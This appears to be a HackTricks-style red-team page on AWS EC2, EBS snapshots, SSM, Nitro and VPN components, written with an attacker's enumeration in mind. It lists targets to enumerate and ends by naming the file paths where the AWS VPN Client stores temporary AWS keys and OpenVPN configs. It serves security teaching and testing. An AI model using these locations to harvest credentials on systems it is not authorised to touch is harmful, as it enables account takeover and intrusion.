Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn what a VPC is and about its components in:
AWS - VPC & Networking Basic InformationAmazon EC2 is utilized for initiating virtual servers. It allows for the configuration of security and networking and the management of storage. The flexibility of Amazon EC2 is evident in its ability to scale resources both upwards and downwards, effectively adapting to varying requirement changes or surges in popularity. This feature diminishes the necessity for precise traffic predictions.
Interesting things to enumerate in EC2:
Virtual Machines
SSH Keys
User Data
Existing EC2s/AMIs/Snapshots
Networking
Networks
Subnetworks
Public IPs
Open ports
Integrated connections with other networks outside AWS
Using roles to grant permissions to applications that run on EC2 instances requires a bit of extra configuration. An application running on an EC2 instance is abstracted from AWS by the virtualized operating system. Because of this extra separation, you need an additional step to assign an AWS role and its associated permissions to an EC2 instance and make them available to its applications.
This extra step is the creation of an instance profile attached to the instance. The instance profile contains the role and can provide the role's temporary credentials to an application that runs on the instance. Those temporary credentials can then be used in the application's API calls to access resources and to limit access to only those resources that the role specifies. Note that only one role can be assigned to an EC2 instance at a time, and all applications on the instance share the same role and permissions.
AWS EC2 metadata is information about an Amazon Elastic Compute Cloud (EC2) instance that is available to the instance at runtime. This metadata is used to provide information about the instance, such as its instance ID, the availability zone it is running in, the IAM role associated with the instance, and the instance's hostname.
In the following page you can check how to abuse EC2 permissions to escalate privileges:
AWS - EC2 PrivescAmazon EBS (Elastic Block Store) snapshots are basically static backups of AWS EBS volumes. In other words, they are copies of the disks attached to an EC2 Instance at a specific point in time. EBS snapshots can be copied across regions and accounts, or even downloaded and run locally.
Snapshots can contain sensitive information such as source code or APi keys, therefore, if you have the chance, it's recommended to check it.
An AMI is used to launch an EC2 instance, while an EC2 Snapshot is used to backup and recover data stored on an EBS volume. While an EC2 Snapshot can be used to create a new AMI, it is not the same thing as an AMI, and it does not include information about the operating system, application server, or other software required to run an application.
In the following page you can check how to abuse EBS permissions to escalate privileges:
AWS - EBS PrivescAmazon Simple Systems Manager (SSM) allows to remotely manage floats of EC2 instances to make their administrations much more easy. Each of these instances need to be running the SSM Agent service as the service will be the one getting the actions and performing them from the AWS API.
SSM Agent makes it possible for Systems Manager to update, manage, and configure these resources. The agent processes requests from the Systems Manager service in the AWS Cloud, and then runs them as specified in the request.
The SSM Agent comes preinstalled in some AMIs or you need to manually install them on the instances. Also, the IAM Role used inside the instance needs to have the policy AmazonEC2RoleforSSM attached to be able to communicate.
You can check in an EC2 instance if Systems Manager is runnign just by executing:
In the following page you can check how to abuse SSM permissions to escalate privileges:
AWS - SSM PrivescElastic Load Balancing (ELB) is a load-balancing service for Amazon Web Services (AWS) deployments. ELB automatically distributes incoming application traffic and scales resources to meet traffic demands.
AWS Nitro is a suite of innovative technologies that form the underlying platform for AWS EC2 instances. Introduced by Amazon to enhance security, performance, and reliability, Nitro leverages custom hardware components and a lightweight hypervisor. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, minimizing the attack surface and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver near bare-metal performance, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the security of the hardware and firmware, further solidifying its robust architecture.
Get more information and how to enumerate it from:
AWS - Nitro EnumA VPN allows to connect your on-premise network (site-to-site VPN) or the workers laptops (Client VPN) with a AWS VPC so services can accessed without needing to expose them to the internet.
Customer Gateway:
A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection.
It is essentially a physical device or software application on your side of the Site-to-Site VPN connection.
You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway.
It serves as a reference point for setting up the VPN connection and doesn't incur additional charges.
Virtual Private Gateway:
A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection.
It is attached to your VPC and serves as the target for your VPN connection.
VPG is the AWS side endpoint for the VPN connection.
It handles the secure communication between your VPC and your on-premises network.
Site-to-Site VPN Connection:
A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel.
This type of connection requires a Customer Gateway and a Virtual Private Gateway.
It's used for secure, stable, and consistent communication between your data center or network and your AWS environment.
Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection.
Client VPN Endpoint:
A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions.
It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network.
It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks.
With Client VPN, each client device uses a VPN client software to establish a secure connection.
You can find more information about the benefits and components of AWS VPNs here.
Local Temporary Credentials
When AWS VPN Client is used to connect to a VPN, the user will usually login in AWS to get access to the VPN. Then, some AWS credentials are created and stored locally to establish the VPN connection. These credentials are stored in $HOME/.config/AWSVPNClient/TemporaryCredentials/<region>/temporary-credentials.txt and contains an AccessKey, a SecretKey and a Token.
The credentials belong to the user arn:aws:sts::<acc-id>:assumed-role/aws-vpn-client-metrics-analytics-access-role/CognitoIdentityCredentials (TODO: research more about the permissions of this credentials).
opvn config files
If a VPN connection was stablished you should search for .opvn config files in the system. Moreover, one place where you could find the configurations is in $HOME/.config/AWSVPNClient/OpenVpnConfigs
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
